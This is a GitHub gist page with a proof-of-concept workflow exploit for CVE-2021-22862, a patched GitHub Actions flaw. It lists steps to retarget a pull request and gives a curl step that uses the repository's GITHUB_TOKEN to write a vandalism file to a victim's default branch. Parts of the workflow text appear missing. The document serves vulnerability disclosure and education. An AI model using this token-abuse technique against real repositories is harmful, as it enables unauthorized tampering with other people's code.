Skip to content

Instantly share code, notes, and snippets.

Last active June 23, 2023 21:48
  • Star 6 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
Star You must be signed in to star a gist
What would you like to do?
Proof-of-concept GitHub Actions workflow exploit (CVE-2021-22862)
# This is a proof-of-concept for a security bug in GitHub Actions which has since been fixed.
# See for more information.
# The proof-of-concept was only ever used in a test environment to validate the existence of the
# vulnerability, and is shown here for educational purposes.
# The proof-of-concept would have the effect of creating a `` file, containing vandalism,
# on the default branch of a victim repository.
# To use the proof-of-concept, the steps would have been:
# 1. Fork the victim repository
# 2. Create a pull request from the fork to the victim repository, making any change
# 3. Put this yml file (`vandalism.yml`) in the `.github/workflows/` folder, and commit it to a different branch of the fork
# 4. Use the GraphQL API to set the `baseRefName` of the pull request from (2) to the commit hash from (3)
name: "Proof-of-concept GitHub Actions workflow"
types: edited
runs-on: ubuntu-latest
- name: Vandalize
run: 'curl -H "Authorization: bearer $GITHUB_TOKEN" -X PUT "$REPO/contents/" --data ''{"message": "Create", "content": "TkFBIHdhcyBoZXJl"}'' '
REPO: ${{ github.repository }}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment